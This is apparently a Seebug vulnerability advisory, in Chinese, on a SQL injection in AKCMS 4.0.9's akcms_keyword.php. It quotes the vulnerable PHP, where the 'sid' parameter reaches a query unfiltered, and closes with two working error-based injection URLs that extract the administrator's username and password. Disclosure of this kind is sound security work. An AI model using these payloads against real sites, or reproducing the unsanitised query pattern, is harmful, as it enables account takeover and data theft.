akcms 4.0.9 akcms_keyword.php SQL注入漏洞

基本字段

漏洞编号：: SSV-90810

披露/发现时间：: 未知

提交时间：: 2016-02-24

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: AKCMS
(4.0.9)

漏洞作者：: 未知

提交者：: watcher

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 watcher 共获得 3.6KB

AKCMS是国内最著名的轻量级CMS建站程序，在主流PHP建站系统中特色鲜明，以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。但在 akcms 4.0.9 中，`akcms_keyword.php` 此文件中存在sql注入漏洞 akcms_keyword.php： ``` <?php $i = strpos(__FILE__, 'akcms_keyword.php'); $mypath = substr(__FILE__, 0, $i); include $mypath.'akcms_config.php'; include $mypath.$system_root.'/fore/keyword.php'; ?> ``` system_root 是和后台目录对应的 ``` <?php $system_root = 'admin'; $foreload = 1; ?> ``` 可以看到包含了`/fore/keyword.php`。我们继续跟进一下这个文件：`admin/fore/keyword.php` ``` <?php if(!isset($_GET['sid']) ||!isset($_GET['keyword']) ) exit(); //判断sid,keyword是否存在 require_once $mypath.$system_root.'/include/common.inc.php'; require_once AK_ROOT.'include/forecache.func.php'; $forecache = getforecache($currenturl); require_once(AK_ROOT.'include/global.func.php'); require_once(AK_ROOT.'include/fore.inc.php'); $sid = $_GET['sid']; $keyword = $_GET['keyword']; //直接获取了$sid,$keyword。并没有进行过滤 $se = getsedata($sid); $k = $db->get_by('*', 'keywords', "sid='$sid' AND keyword='".addslashes($keyword)."'"); //对$keyword进行了转义，但是对$sid并没有进行任何处理，直接取用。 if(!isset($template)) $template = $se['template']; $variables = array(); $variables['template'] = $template; $variables['html'] = 0; $variables['sid'] = $sid; $variables['num'] = $k['num']; $variables['keyword'] = $keyword; $variables['keyword_url'] = urlencode($keyword); $variables['keyword_html'] = htmlspecialchars($keyword); $html = render_template($variables); if($forecache === false) setforecache($currenturl, $html); if(substr($html, 0, 5) == '<?xml') header('Content-Type:text/xml;charset='.$header_charset); echo $html; require_once(AK_ROOT.'include/exit.php'); ?> ``` 可以看出，虽然程序员对 `$keyword` 进行了转义，但是对`$sid`并没有进行任何处理，直接使用了。我们再跟入一下这个函数：$db->get_by ``` function get_by($what, $from, $where = '') { $table = $this->fulltablename($from); $sql = "SELECT {$what} FROM {$table}"; if($where != '') $sql .= " WHERE {$where}"; if(strpos($what, '(') === false) $sql .= " LIMIT 1"; $row = $this->get_one($sql); if($row === false) { return false; } elseif(count($row) == 1) { return current($row); } else { return $row; } } ``` 函数功能是select查询，这里也没有对$sid变量进行任何过滤。也就是说，`$sid` 从 `$_GET['sid']`被获取之后，直接带入了select查询，从而导致了sql注入漏洞的产生漏洞证明： ![](https://images.seebug.org/1456309757236) 获取管理员账号: ``` http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111’and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,editor,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1&keyword=11 ``` 获取管理员密码: ``` http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111’and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1&keyword=11 ```